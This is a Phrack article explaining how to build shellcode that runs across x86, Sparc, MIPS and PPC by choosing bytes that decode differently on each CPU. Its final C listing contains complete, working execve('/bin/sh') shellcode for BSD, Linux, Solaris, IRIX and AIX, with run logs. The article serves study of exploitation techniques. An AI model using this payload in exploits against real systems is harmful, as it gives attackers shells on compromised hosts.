                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x39, Phile #0x0e of 0x12

|=---------------=[ Architecture Spanning Shellcode ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=--------------------=[ eugene@gravitino.net ]=-------------------------=|


Introduction
------------

At defcon8 caezar's challenge 4 party [1] a problem was presented: write
a shellcode that would run on two or more processor platforms. Below you
will find my solution (don't forget to check the credits section).

The general idea behind an architecture spanning shellcode is to come up
with a sequence of bytes that executes a jump instruction on one
architecture while executing a nop-like instruction on another
architecture. That way we can branch to architecture specific code
depending on the platform our code is running on.

Here is an ASCII representation of our byte stream:

     XXX
     arch1 shellcode
     arch2 shellcode

where XXX is a sequence of bytes that is going to branch to arch2's
shellcode on architecture 2 and is going to fall through to arch1
shellcode on architecture 1. If we want to add more platforms we would
need to add additional jump/nop instructions for each additional
platform.


MIPS architecture
------------------

A brief introduction to the MIPS architecture and writing MIPS shellcode
was described by scut in phrack 56 [2] as well as by the LSD folks in
their paper [8].

The only thing that is worth repeating here is the general MIPS
instruction format. All MIPS instructions occupy 32 bits and the six most
significant bits specify the instruction opcode [6][7]. There are 3
instruction formats: I-Type (immediate), J-Type (Jump) and R-Type
(Register). Since we are looking for nop-like instructions we are mostly
interested in I and R type instructions, whose formats are listed below.

I-Type instruction format:

   31 30 29 28 27 26|25 24 23 22 21|20 19 18 17 16|15 .. 0
           op       |      rs      |      rt      |immediate

fields are:
   op          6-bit operation code
   rs          5-bit source register specifier
   rt          5-bit target (src/dest) or branch condition
   immediate   16-bit immediate, branch or address displacement

R-Type instruction format:

   31 30 29 28 27 26|25 24 23 22 21|20 19 18 17 16|15 14 13 12 11|10 9 8 7 6|5 .. 0
           op       |      rs      |      rt      |      rd      |  shamt   |funct

fields are:
   op          6-bit operation code
   rs          5-bit source register specifier
   rt          5-bit target (src/dest) or branch condition
   rd          5-bit destination register specifier
   shamt       5-bit shift amount
   funct       6-bit function field


Sparc architecture
------------------

Similarly to MIPS, Sparc is a RISC based architecture. All the Sparc
instructions occupy 32 bits and the two most significant bits specify an
instruction class [4]:

   op    Instruction Class
   00    Branch instructions
   01    call instruction
   10    Format Three instructions (type 1)
   11    Format Three instructions (type 2)

The format one call instruction contains an op field '01' followed by 30
bits of address displacement. Even though this would be the optimal
instruction to use, since we control 30 bits out of 32, we won't be able
to use it: the 30-bit displacement of a short jump is almost all zero
bits, so the instruction tends to have 0 bytes in it.

Format three instructions (type 2) are mostly load/store instructions,
which are useless to us since we are only looking for relatively harmless
nop-like instructions. We definitely don't want to use anything that has
the possibility of crashing our program (SIGSEGV in case of an illegal
load/store).

This leaves us with branch and format three instructions (type 1) to use.
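As a quick sanity check on the field layouts above, here is a minimal C
sketch that pulls the MIPS fields and the Sparc op class out of a 32-bit
word. The names mips_fields, mips_decode and sparc_class are made up for
this illustration and do not come from any toolkit; the word is assumed to
have been read big-endian from the byte stream already.

```c
#include <stdint.h>

/* Hypothetical helper types/names, for illustration only. */
struct mips_fields {
    unsigned op;     /* bits 31..26 */
    unsigned rs;     /* bits 25..21 */
    unsigned rt;     /* bits 20..16 */
    unsigned rd;     /* bits 15..11 (R-Type only) */
    unsigned shamt;  /* bits 10..6  (R-Type only) */
    unsigned funct;  /* bits  5..0  (R-Type only) */
    unsigned imm;    /* bits 15..0  (I-Type only) */
};

/* Split a MIPS instruction word into both the I-Type and R-Type views. */
static struct mips_fields mips_decode(uint32_t w)
{
    struct mips_fields f;

    f.op    = (w >> 26) & 0x3f;
    f.rs    = (w >> 21) & 0x1f;
    f.rt    = (w >> 16) & 0x1f;
    f.rd    = (w >> 11) & 0x1f;
    f.shamt = (w >> 6)  & 0x1f;
    f.funct = w & 0x3f;
    f.imm   = w & 0xffff;
    return f;
}

/* Sparc instruction class: 0 = branch, 1 = call, 2 and 3 = format three. */
static unsigned sparc_class(uint32_t w)
{
    return (unsigned)(w >> 30);
}
```

Whether a candidate word is an I-Type or an R-Type instruction depends on
the op value, so the sketch simply exposes both views and leaves the
interpretation to the reader.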
Here is the format of a format three instruction:

   31 30|29 28 27 26 25|24 23 22 21 20 19|18 17 16 15 14|13 |12 11 10 9 8 7 .. 0
    op  |      rd      |       op3       |     rs1      |0/1|     rs2 / imm

fields are:
   op          2-bit instruction class (10)
   rd          5-bit destination register specifier
   op3         6-bit instruction specifier
   rs1         5-bit source register
   0/1         1-bit constant / second source register option
   rs2 / imm   13-bit field that specifies either a second source
               register or a constant

Some of the promising looking (harmless) format three instructions are
add, and, or, xor and sll/srl (specified by the op3 bits).

And here is the branch instruction format:

   31 30|29|28 27 26 25|24 23 22|21 .. 0
    op  |a | condition |  op2   |displacement

fields are:
   op            2-bit instruction class (00)
   a             1-bit annulled flag
   condition     4-bit condition specifier.. ba, bn, bl, ble, be, etc
   op2           3-bit condition code (integer condition code is 010)
   displacement  22-bit address displacement

As you can see, a lot of the fields already have predefined values which
we need to work around.


PPC architecture
----------------

PowerPC is yet another RISC architecture used by vendors such as IBM and
Apple. See LSD's paper [8] for more information.


x86 architecture
----------------

The topic of buffer overflows and shellcode on the x86 architecture has
been beaten to death before. For a good introduction see Aleph1's article
in phrack 49 [3].

To expand just a little bit on the topic I am going to present x86 code
that works on multiple x86 operating systems. The idea behind an "OS
spanning" shellcode is to set up all the registers and the stack in such
a way as to satisfy the requirements of all the operating systems that
our shellcode is meant to execute on. For example, BSD passes its syscall
parameters on the stack while Linux uses registers. If we set up both the
registers and the stack then our code will run on both BSD and Linux x86
systems. The only problem with writing shellcode for BSD & Linux systems
is the different execve() syscall numbers the two systems use.
Linux uses syscall number 0xb while BSD uses 0x3b. To overcome this
problem, we need to distinguish between the two systems at runtime. There
are plenty of ways to do that, such as checking where various segments
are mapped, the way segment registers are set up, etc. I chose to analyze
the segment registers since that method seems to be pretty robust. On
Linux systems, for example, segment registers fs and gs are set to 0 (in
user mode) while on BSD systems they are set to non zero values (0x1f on
OpenBSD, 0x2f on FreeBSD). We can exploit that difference to distinguish
between the two systems. See the "Adding more architectures" section for
a working example.

Another way to handle the different syscall numbers is to ignore the
"invalid system call" SIGSYS signal and just try a different syscall
number if the first execve() call failed. While that method certainly
works, it is quite limited and cannot be applied to other operating
systems such as x86 Solaris, which doesn't use the 0x80 interrupt trap
gate.

Note that "OS Spanning" shellcode is certainly not restricted to the x86
platform; the same idea can be applied to any hardware platform and any
operating system.


Putting it all together.. Architecture spanning shellcode
---------------------------------------------------------

As I have mentioned before, our shellcode (first attempt) is going to
look like

     XXX
     arch1 shellcode
     arch2 shellcode

where XXX is a specially crafted string that executes different
instructions on two different platforms.

When I initially started looking for a working XXX string, I took an x86
short jump instruction and tried to decode it on a sun box. Since the
first byte of an x86 short jump instruction is 0xEB (which is almost all
1's) [5], the instruction decoded into a weird format 3 sparc
instruction.

My next attempt consisted of writing a sparc jump instruction and trying
to decode it on an x86 platform.
That idea almost worked, but I was unable to decode the sparc jump
instruction into a nop-like x86 xor instruction due to a one bit offset
difference.

The next attempt consisted of padding an x86 jump instruction. Since an
x86 short jump instruction is 2 bytes long and all the sparc instructions
are 4 bytes long, I had 2 bytes to play with. I knew that I had to insert
some bytes before the 0xEB jump byte in order to be able to decode the
instruction into something reasonable on sparc. For my pad bytes I chose
the x86 0x90 nop bytes, which turned out to be a good idea since 0x90 is
mostly all 0's. My instruction stream then looked like

     \x90\x90\xeb\x30

where 0x90 is the x86 nop instruction, 0xEB is the opcode for an x86
short jump and 0x30 is a 48 byte jump offset (the length of the sparc
shellcode that follows). Here is what the above string decoded to on a
Sun machine:

     (gdb) x 0x1054c
     0x1054c :        0x9090eb30
     (gdb) x/t 0x1054c
     0x1054c :        10010000100100001110101100110000
     (gdb) x/i 0x1054c
     0x1054c :        orcc  %g3, 0xb30, %o0

As you can see, our string decoded to a harmless format 3 'or'
instruction that only clobbered the %o0 register (and the condition
codes). This is exactly what we were looking for: a short jump on one
architecture (x86) and a harmless instruction on another architecture
(sparc). With that in mind our shellcode now looks like this:

     \x90\x90\xeb\x30
     [sparc shellcode]
     [x86 shellcode]

Let's try it out..
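Before running anything, the gdb decoding of the magic string can be
reproduced by hand. The following is a minimal C sketch, not part of the
original ass.c: the names be32, sparc_f3 and sparc_f3_decode are invented
for illustration, and the field positions are taken from the format three
layout given in the Sparc section.

```c
#include <stdint.h>

/* Hypothetical helper type/names, for illustration only. */
struct sparc_f3 {
    unsigned op;     /* bits 31..30, instruction class        */
    unsigned rd;     /* bits 29..25, destination register     */
    unsigned op3;    /* bits 24..19, instruction specifier    */
    unsigned rs1;    /* bits 18..14, first source register    */
    unsigned i;      /* bit  13, 1 = immediate, 0 = rs2       */
    int      simm13; /* bits 12..0, sign-extended immediate   */
};

/* Read four bytes of shellcode the way a big-endian Sparc fetches them. */
static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Split a word into Sparc format three fields. */
static struct sparc_f3 sparc_f3_decode(uint32_t w)
{
    struct sparc_f3 f;
    unsigned raw = w & 0x1fff;

    f.op     = (unsigned)(w >> 30);
    f.rd     = (w >> 25) & 0x1f;
    f.op3    = (w >> 19) & 0x3f;
    f.rs1    = (w >> 14) & 0x1f;
    f.i      = (w >> 13) & 1;
    f.simm13 = (raw & 0x1000) ? (int)raw - 0x2000 : (int)raw;
    return f;
}
```

Feeding it the bytes \x90\x90\xeb\x30 gives op 2, rd 8 (%o0), op3 0x12,
rs1 3 (%g3), the immediate bit set and an immediate of 0xb30, which
matches the orcc line gdb printed (0x12 being the op3 value of orcc).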
[openbsd]$ cat ass.c      ; ass as in Architecture Spanning Shellcode :)
char sc[] =
    /* magic string */
    "\x90\x90\xeb\x30"

    /* sparc solaris execve() */
    "\x2d\x0b\xd8\x9a"              /* sethi   $0xbd89a, %l6        */
    "\xac\x15\xa1\x6e"              /* or      %l6, 0x16e, %l6      */
    "\x2f\x0b\xdc\xda"              /* sethi   $0xbdcda, %l7        */
    "\x90\x0b\x80\x0e"              /* and     %sp, %sp, %o0        */
    "\x92\x03\xa0\x08"              /* add     %sp, 8, %o1          */
    "\x94\x1a\x80\x0a"              /* xor     %o2, %o2, %o2        */
    "\x9c\x03\xa0\x10"              /* add     %sp, 0x10, %sp       */
    "\xec\x3b\xbf\xf0"              /* std     %l6, [%sp - 0x10]    */
    "\xdc\x23\xbf\xf8"              /* st      %sp, [%sp - 0x08]    */
    "\xc0\x23\xbf\xfc"              /* st      %g0, [%sp - 0x04]    */
    "\x82\x10\x20\x3b"              /* mov     $0x3b, %g1           */
    "\x91\xd0\x20\x08"              /* ta      8                    */

    /* BSD execve() */
    "\xeb\x17"                      /* jmp                          */
    "\x5e"                          /* pop     %esi                 */
    "\x31\xc0"                      /* xor     %eax, %eax           */
    "\x50"                          /* push    %eax                 */
    "\x88\x46\x07"                  /* mov     %al,0x7(%esi)        */
    "\x89\x46\x0c"                  /* mov     %eax,0xc(%esi)       */
    "\x89\x76\x08"                  /* mov     %esi,0x8(%esi)       */
    "\x8d\x5e\x08"                  /* lea     0x8(%esi),%ebx       */
    "\x53"                          /* push    %ebx                 */
    "\x56"                          /* push    %esi                 */
    "\x50"                          /* push    %eax                 */
    "\xb0\x3b"                      /* mov     $0x3b, %al           */
    "\xcd\x80"                      /* int     $0x80                */
    "\xe8\xe4\xff\xff\xff"          /* call                         */
    "\x2f\x62\x69\x6e\x2f\x73\x68"; /* /bin/sh                      */

int
main(void)
{
    void (*f)(void) = (void (*)(void)) sc;

    f();

    return 0;
}

[openbsd]$ gcc ass.c
[openbsd]$ ./a.out
$ uname -ms
OpenBSD i386

[solaris]$ gcc ass.c
[solaris]$ ./a.out
$ uname -ms
SunOS sun4u

it worked!


Adding more architectures
-------------------------

Theoretically, spanning shellcode is not tied to any specific operating
system nor any specific hardware architecture. Thus it should be possible
to write shellcode that runs on more than two architectures. The format
for our shellcode (second attempt) that runs on 3 architectures is going
to be

     XXX
     YYY
     arch1 shellcode
     arch2 shellcode
     arch3 shellcode

where arch1 is MIPS, arch2 is Sparc and arch3 is x86.

My first attempt was to try and reuse the magic string from ass.c.
Unfortunately, 0x9090eb30 didn't decode into anything reasonable on an
IRIX platform and so I was forced to look elsewhere. My next attempt was
to replace the 0x90 bytes with some other nop-like bytes, looking for a
sequence that would work on both Sparc & MIPS platforms. After trying out
a bunch of x86 nop instructions from K2's ADMmutate toolkit, I stumbled
upon the AAA instruction, whose opcode is 0x37. The AAA instruction
worked out great since the 0x3737eb78 string (the jump offset grows to
0x78 to skip the extra code) decoded correctly on all three platforms:

     x86:     aaa
              aaa
              jmp   +120
     sparc:   sethi %hi(0xdFADE000), %i3
     mips:    ori   $s7,$t9,0xeb78

With the XXX string out of the way, I was left with the YYY part for the
MIPS and Sparc platforms. The very first instruction I tried worked on
both platforms. The instruction was a Sparc annulled short jump ba,a
(0x30800012), which decoded to

     andi $zero,$a0,0x12

on a MIPS platform. Not only did the jump instruction decode to a
harmless 'andi' on a MIPS platform, it also didn't require a branch delay
slot instruction after it since the ba jump was annulled [4].

So now our shellcode looks like this

     "\x37\x37\xeb\x78"      /* x86:   aaa; aaa; jmp 116+4         */
                             /* MIPS:  ori   $s7,$t9,0xeb78        */
                             /* Sparc: sethi %hi(0xdfade000),%i3   */

     "\x30\x80\x00\x12"      /* MIPS:  andi  $zero,$a0,0x12        */
                             /* Sparc: ba,a  +72                   */

     [snip real shellcode]

While we are adding more architectures to our shellcode let's also take a
look at PPC/AIX. The first logical thing to do is to try and decode the
existing XXX and YYY strings from the above shellcode on the PPC
platform:

     (gdb) x 0x10000364
     0x10000364 :     0x3737eb78
     (gdb) x/i 0x10000364
     0x10000364 :     addic.  r25,r23,-5256
     (gdb) x/x 0x10000368
     0x10000368 :     0x30800012
     (gdb) x/i 0x10000368
     0x10000368 :     addic   r4,r0,18

Is this our lucky day or what? The XXX and YYY strings from the above
MIPS/x86/Sparc combo have correctly decoded to two harmless add
instructions.
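The two PPC decodings can be cross-checked the same way as the Sparc one.
Below is a small C sketch under the assumption that both words use the
PowerPC D-form layout (6-bit primary opcode, 5-bit rD, 5-bit rA, 16-bit
signed immediate), where primary opcode 12 is addic and 13 is addic.; the
names ppc_dform and ppc_dform_decode are made up for this example.

```c
#include <stdint.h>

/* Hypothetical helper type/names, for illustration only. */
struct ppc_dform {
    unsigned opcd;  /* bits 31..26, primary opcode            */
    unsigned rd;    /* bits 25..21, destination register      */
    unsigned ra;    /* bits 20..16, source register           */
    int      simm;  /* bits 15..0, sign-extended immediate    */
};

/* Split a big-endian instruction word into PowerPC D-form fields. */
static struct ppc_dform ppc_dform_decode(uint32_t w)
{
    struct ppc_dform f;
    unsigned raw = w & 0xffff;

    f.opcd = (unsigned)(w >> 26);
    f.rd   = (w >> 21) & 0x1f;
    f.ra   = (w >> 16) & 0x1f;
    f.simm = (raw & 0x8000) ? (int)raw - 0x10000 : (int)raw;
    return f;
}
```

For 0x3737eb78 this yields opcode 13, rD 25, rA 23 and an immediate of
-5256; for 0x30800012 it yields opcode 12, rD 4, rA 0 and an immediate of
18, in line with the gdb output above.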
All we need to do now is to come up with another instruction that is
going to execute a jump on a MIPS platform while executing a nop on
PPC/AIX. After a bit of searching, the MIPS 'bgtz' instruction turned out
to decode into a valid multiply instruction on AIX:

     [MIPS]
     (gdb) x 0x10001008
     0x10001008 :     0x1ee00101
     (gdb) x/i 0x10001008
     0x10001008 :     bgtz    $s7,0x10001410 <+1040>

     [AIX]
     (gdb) x 0x10000378
     0x10000378 :     0x1ee00101
     (gdb) x/i 0x10000378
     0x10000378 :     mulli   r23,r0,257

The bgtz instruction is a branch on greater than zero [7]. Notice that
the branch instruction uses the $s7 register, which was modified by us in
a previous nop instruction. The branch displacement is set to 0x0101 (to
avoid NULL bytes in the instruction), which is equivalent to a 1028 byte
forward jump relative to the delay slot, or 1032 bytes from the branch
instruction itself.

Let's put everything together now..

[openbsd]$ cat ass.c
/*
 * Architecture/OS Spanning Shellcode
 *
 * runs on x86 (freebsd, netbsd, openbsd, linux), MIPS/Irix, Sparc/Solaris
 * and PPC/AIX (AIX platforms require -DAIX compiler flag)
 *
 * eugene@gravitino.net
 */

char sc[] =
    /* voodoo */
    "\x37\x37\xeb\x7b"      /* x86:     aaa; aaa; jmp +123            */
                            /* MIPS:    ori   $s7,$t9,0xeb7b          */
                            /* Sparc:   sethi %hi(0xdFADEc00), %i3    */
                            /* PPC/AIX: addic. r25,r23,-5253          */

    "\x30\x80\x01\x14"      /* MIPS:    andi  $zero,$a0,0x114         */
                            /* Sparc:   ba,a  +1104                   */
                            /* PPC/AIX: addic r4,r0,276               */

    "\x1e\xe0\x01\x01"      /* MIPS:    bgtz  $s7, +1032              */
                            /* PPC/AIX: mulli r23,r0,257              */

    "\x30\x80\x01\x14"      /* fill in the MIPS branch delay slot
                               with the above MIPS / AIX nop          */

    /* PPC/AIX shellcode by LAST STAGE OF DELIRIUM  *://lsd-pl.net/   */
    "\x7e\x94\xa2\x79"      /* xor.
r20,r20,r20 */ "\x40\x82\xff\xfd" /* bnel */ "\x7e\xa8\x02\xa6" /* mflr r21 */ "\x3a\xc0\x01\xff" /* lil r22,0x1ff */ "\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */ "\x7e\xb5\xba\x14" /* cax r21,r21,r23 */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "\x04\x82\x53\x71" "\x87\xa0\x89\xfc" "\x69\x68\x67\x65" "\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */ "\x44\xff\xff\x02" /* svca 0x0 */ "\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */ "\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */ "\x40\x82\xff\xfd" /* bnel */ "\x7f\xe8\x02\xa6" /* mflr r31 */ "\x3b\xff\x01\x20" /* cal r31,0x120(r31) */ "\x38\x7f\xff\x08" /* cal r3,-248(r31) */ "\x38\x9f\xff\x10" /* cal r4,-240(r31) */ "\x90\x7f\xff\x10" /* st r3,-240(r31) */ "\x90\xbf\xff\x14" /* st r5,-236(r31) */ "\x88\x55\xff\xf4" /* lbz r2,-12(r21) */ "\x98\xbf\xff\x0f" /* stb r5,-241(r31) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "/bin/sh" /* x86 BSD/Linux execve() by me */ "\xeb\x29" /* jmp */ "\x5e" /* pop %esi */ "\x31\xc0" /* xor %eax, %eax */ "\x50" /* push %eax */ "\x88\x46\x07" /* mov %al,0x7(%esi) */ "\x89\x46\x0c" /* mov %eax,0xc(%esi) */ "\x89\x76\x08" /* mov %esi,0x8(%esi) */ "\x8d\x5e\x08" /* lea 0x8(%esi),%ebx */ "\x53" /* push %ebx */ "\x56" /* push %esi */ "\x50" /* push %eax */ /* setup registers for linux */ "\x8d\x4e\x08" /* lea 0x8(%esi),%ecx */ "\x8d\x56\x08" /* lea 0x8(%esi),%edx */ "\x89\xf3" /* mov %esi, %ebx */ /* distinguish between BSD & Linux */ "\x8c\xe0" /* movl %fs, %eax */ "\x21\xc0" /* andl %eax, %eax */ "\x74\x04" /* jz +4 */ "\xb0\x3b" /* mov $0x3b, %al */ "\xeb\x02" /* jmp +2 */ "\xb0\x0b" /* mov $0xb, %al */ "\xcd\x80" /* int $0x80 */ "\xe8\xd2\xff\xff\xff" /* call */ "\x2f\x62\x69\x6e" /* /bin */ "\x2f\x73\x68" /* /sh */ /* * pad the MIPS/Irix & Sparc/Solaris shellcodes * jumps of > 0x0101 bytes are performed on both platforms * to avoid NULL bytes in the jump instructions */ "2359595912811011811145128130124118116118121114127231291301241171" 
"2911813245571341291181211101231241181291101234512913012411712911" "8132455712712412112411245123118120128451291301241171291181324512" "9128118133114451141004559113130110111451141171294511512445134129" "1301101141112311411712945571171121291181321284511411712945113123" "1104512312412712911211412111445114117129451151244511312112712413" "2451141171294559595913212412345113121127124132451271301244512811" "8451281181179797117118128451181284512413012745132124127121113451" "2312413259595945129117114451321241271211134512411545129117114451" "1412111411212912712412345110123113451291171144512813211812911211" "7574512911711423111114110130129134451241154512911711445111110130" "1135945100114451141331181281294513211812911712413012945128120118" "1234511212412112412757451321181291171241301294512311012911812412" "31101211181291345745132118" /* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso */ "\xaf\xa0\xff\xfc" /* sw $zero, -4($sp) */ "\x24\x06\x73\x50" /* li $a2, 0x7350 */ "\x04\xd0\xff\xff" /* bltzal $a2, dpatch */ "\x8f\xa6\xff\xfc" /* lw $a2, -4($sp) */ /* a2 = (char **) envp = NULL */ "\x24\x0f\xff\xcb" /* li $t7, -53 */ "\x01\xe0\x78\x27" /* nor $t7, $t7, $zero */ "\x03\xef\xf8\x21" /* addu $ra, $ra, $t7 */ /* a0 = (char *) pathname */ "\x23\xe4\xff\xf8" /* addi $a0, $ra, -8 */ /* fix 0x42 dummy byte in pathname to shell */ "\x8f\xed\xff\xfc" /* lw $t5, -4($ra) */ "\x25\xad\xff\xbe" /* addiu $t5, $t5, -66 */ "\xaf\xed\xff\xfc" /* sw $t5, -4($ra) */ /* a1 = (char **) argv */ "\xaf\xa4\xff\xf8" /* sw $a0, -8($sp) */ "\x27\xa5\xff\xf8" /* addiu $a1, $sp, -8 */ "\x24\x02\x04\x23" /* li $v0, 1059 (SYS_execve) */ "\x01\x01\x01\x0c" /* syscall */ "\x2f\x62\x69\x6e" /* .ascii "/bin" */ "\x2f\x73\x68\x42" /* .ascii "/sh", .byte 0xdummy */ /* Sparc Solaris execve() by an unknown author */ "\x2d\x0b\xd8\x9a" /* sethi $0xbd89a, %l6 */ "\xac\x15\xa1\x6e" /* or %l6, 0x16e, %l6 */ "\x2f\x0b\xdc\xda" /* sethi $0xbdcda, %l7 */ "\x90\x0b\x80\x0e" /* and %sp, %sp, %o0 */ "\x92\x03\xa0\x08" /* 
add     %sp, 8, %o1          */
    "\x94\x1a\x80\x0a"      /* xor     %o2, %o2, %o2        */
    "\x9c\x03\xa0\x10"      /* add     %sp, 0x10, %sp       */
    "\xec\x3b\xbf\xf0"      /* std     %l6, [%sp - 0x10]    */
    "\xdc\x23\xbf\xf8"      /* st      %sp, [%sp - 0x08]    */
    "\xc0\x23\xbf\xfc"      /* st      %g0, [%sp - 0x04]    */
    "\x82\x10\x20\x3b"      /* mov     $0x3b, %g1           */
    "\x91\xd0\x20\x08"      /* ta      8                    */
;

int
main(void)
{
#if defined(AIX)
    /* copyright LAST STAGE OF DELIRIUM feb 2001 poland */
    int jump[2]={(int)sc,*((int*)&main+1)};
    ((*(void (*)())jump)());
#else
    void (*f)(void) = (void (*)(void)) sc;

    f();
#endif

    return 0;
}

[openbsd]$ gcc ass.c
[openbsd]$ ./a.out
$ uname -ms
OpenBSD i386

[freebsd]$ gcc ass.c
[freebsd]$ ./a.out
$ uname -ms
FreeBSD i386

[linux]$ gcc ass.c
[linux]$ ./a.out
$ uname -ms
Linux i686

[solaris]$ gcc ass.c
[solaris]$ ./a.out
$ uname -ms
SunOS sun4u

[irix]$ gcc ass.c
[irix]$ ./a.out
$ uname -ms
IRIX IP22

[aix]$ gcc ass.c
[aix]$ ./a.out
$ uname -ms
AIX 000089101000


Conclusion
-----------

Architecture spanning shellcode is specially crafted code that executes
differently depending on the architecture it is being run on. The code
achieves that by using a series of bytes which decode to different
instructions on different architectures.

OS spanning shellcode is specially crafted code that executes on multiple
operating systems all running on the same platform. The code achieves
that by setting up the registers and the stack in a way that satisfies
all the operating systems that the code is being run on.


Credits / Thanks
----------------

Greg Hoglund for working with me on this idea at the challenge party
prole and harm for coming up with the idea way before the challenge
     http://www.redgeek.net/~prole/ASSC.txt
gravitino.net, GHI, skyper, spoonm


References
----------

[1] Caezar's challenge
    http://www.caezarschallenge.org
[2] Writing MIPS/IRIX shellcode
    scut (phrack 56)
[3] Smashing The Stack For Fun And Profit
    Aleph One (phrack 49)
[4] SPARC Architecture, Assembly Language Programming, and C. 2nd ed.
    Richard P. Paul
[5] IA-32 Intel Architecture, Software Developer's Manual
    Intel, Corp
    http://developer.intel.com
[6] Computer Organization and Design
    David A. Patterson and John L. Hennessy
[7] MIPS RISC Architecture
    Gerry Kane and Joe Heinrich
[8] UNIX Assembly Codes Development for Vulnerabilities Illustration
    Purposes
    The Last Stage of Delirium Research Group
    http://lsd-pl.net

|=[ EOF ]=---------------------------------------------------------------=|